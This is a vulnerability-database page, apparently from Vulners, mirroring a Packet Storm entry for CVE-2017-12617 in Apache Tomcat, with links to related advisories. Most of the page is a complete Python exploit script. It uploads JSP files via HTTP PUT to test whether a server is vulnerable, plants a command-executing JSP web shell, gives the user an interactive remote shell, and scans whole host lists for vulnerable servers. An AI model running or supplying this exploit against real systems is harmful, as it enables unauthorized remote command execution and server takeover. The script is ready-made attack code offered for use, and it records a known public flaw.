Lucene search
K

Apache Tomcat Upload Bypass / Remote Code Execution

🗓️ 10 Oct 2017 00:00:00Reported by intx0x80Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 188 Views

Apache Tomcat Remote Code Execution using Python script

Related
Code
ReporterTitlePublishedViews
Family
Gitee
Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
16 May 202116:14
gitee
Gitee
Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
27 Apr 202114:33
gitee
Gitee
Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
6 Jul 202503:24
gitee
Gitee
Exploit for Argument Injection in Phpmailer_Project Phpmailer
5 Dec 201914:28
gitee
Gitee
Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
22 Oct 202115:45
gitee
IBM Security Bulletins
Security Bulletin: Multiple Security Vulnerabilities in Apache Tomcat affect IBM Rational License Key Server Administration and Reporting Tool
17 Jun 201805:23
ibm
IBM Security Bulletins
Security Bulletin: Multiple security vulnerabilities have been identified in Jazz Reporting Service shipped with Rational Insight (CVE-2017-12615, CVE-2017-12616, CVE-2017-12617)
17 Jun 201805:23
ibm
IBM Security Bulletins
Security Bulletin: Security vulnerabilities in Apache Tomcat affect multiple IBM Rational products based on IBM's Jazz technology
28 Apr 202118:35
ibm
IBM Security Bulletins
Security Bulletin: Rational Build Forge Security Advisory for Apache HTTPD, Apache Tomcat and OpenSSL Upgrade
17 Jun 201805:24
ibm
IBM Security Bulletins
Security Bulletin: WebSphere Message Broker and IBM Integration Bus is affected by Open Source Apache Tomcat Vulnerabilities (CVE-2017-12617,CVE-2017-12615)
23 Mar 202020:41
ibm
Rows per page
`#!/usr/bin/python  
import requests  
import re  
import signal  
from optparse import OptionParser  
  
  
  
  
  
  
  
  
class bcolors:  
HEADER = '\033[95m'  
OKBLUE = '\033[94m'  
OKGREEN = '\033[92m'  
WARNING = '\033[93m'  
FAIL = '\033[91m'  
ENDC = '\033[0m'  
BOLD = '\033[1m'  
UNDERLINE = '\033[4m'  
  
  
  
  
banner="""  
  
  
_______ ________ ___ ___ __ ______ __ ___ __ __ ______   
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |  
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /   
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /   
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /   
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/   
  
  
  
[@intx0x80]  
  
"""  
  
  
  
  
  
def signal_handler(signal, frame):  
  
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")  
  
exit()  
  
signal.signal(signal.SIGINT, signal_handler)  
  
  
  
  
def removetags(tags):  
remove = re.compile('<.*?>')  
txt = re.sub(remove, '\n', tags)  
return txt.replace("\n\n\n","\n")  
  
  
def getContent(url,f):  
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}  
re=requests.get(str(url)+"/"+str(f), headers=headers)  
return re.content  
  
def createPayload(url,f):  
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'  
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}  
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)  
if req.status_code==201:  
print "File Created .."  
  
  
def RCE(url,f):  
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""  
<INPUT name='cmd' type=text>  
<INPUT type=submit value='Run'>  
</FORM>  
<%@ page import="java.io.*" %>  
<%  
String cmd = request.getParameter("cmd");  
String output = "";  
if(cmd != null) {  
String s = null;  
try {  
Process p = Runtime.getRuntime().exec(cmd,null,null);  
BufferedReader sI = new BufferedReader(new  
InputStreamReader(p.getInputStream()));  
while((s = sI.readLine()) != null) { output += s+"</br>"; }  
} catch(IOException e) { e.printStackTrace(); }  
}  
%>  
<pre><%=output %></pre>"""  
  
  
  
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}  
  
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)  
  
  
  
def shell(url,f):  
  
while True:  
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}  
cmd=raw_input("$ ")  
payload={'cmd':cmd}  
if cmd=="q" or cmd=="Q":  
break  
  
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)  
re=str(re.content)  
t=removetags(re)  
print t  
  
  
  
  
  
#print bcolors.HEADER+ banner+bcolors.ENDC  
  
parse=OptionParser(  
  
  
bcolors.HEADER+"""  
  
  
_______ ________ ___ ___ __ ______ __ ___ __ __ ______   
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |  
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /   
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /   
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /   
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/   
  
  
  
  
./cve-2017-12617.py [options]  
  
options:  
  
-u ,--url [::] check target url if it's vulnerable   
-p,--pwn [::] generate webshell and upload it  
-l,--list [::] hosts list  
  
[+]usage:  
  
./cve-2017-12617.py -u http://127.0.0.1  
./cve-2017-12617.py --url http://127.0.0.1  
./cve-2017-12617.py -u http://127.0.0.1 -p pwn  
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn  
./cve-2017-12617.py -l hotsts.txt  
./cve-2017-12617.py --list hosts.txt  
  
  
[@intx0x80]  
  
"""+bcolors.ENDC  
  
)  
  
  
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")   
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")  
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")  
  
(opt,args)=parse.parse_args()  
  
if opt.U==None and opt.P==None and opt.L==None:  
print(parse.usage)  
exit(0)  
  
  
  
else:  
if opt.U!=None and opt.P==None and opt.L==None:  
print bcolors.OKGREEN+banner+bcolors.ENDC   
url=str(opt.U)  
checker="Poc.jsp"  
print bcolors.BOLD +"Poc Filename {}".format(checker)  
createPayload(str(url)+"/",checker)  
con=getContent(str(url)+"/",checker)  
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:  
print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC  
print bcolors.WARNING+url+"/"+checker+bcolors.ENDC  
  
else:  
print 'Not Vulnerable to CVE-2017-12617 '  
elif opt.P!=None and opt.U!=None and opt.L==None:  
print bcolors.OKGREEN+banner+bcolors.ENDC   
pwn=str(opt.P)  
url=str(opt.U)  
print "Uploading Webshell ....."  
pwn=pwn+".jsp"  
RCE(str(url)+"/",pwn)  
shell(str(url),pwn)  
elif opt.L!=None and opt.P==None and opt.U==None:  
print bcolors.OKGREEN+banner+bcolors.ENDC   
w=str(opt.L)  
f=open(w,"r")  
print "Scaning hosts in {}".format(w)  
checker="Poc.jsp"  
for i in f.readlines():  
i=i.strip("\n")  
createPayload(str(i)+"/",checker)  
con=getContent(str(i)+"/",checker)  
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:  
print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Oct 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.9438
188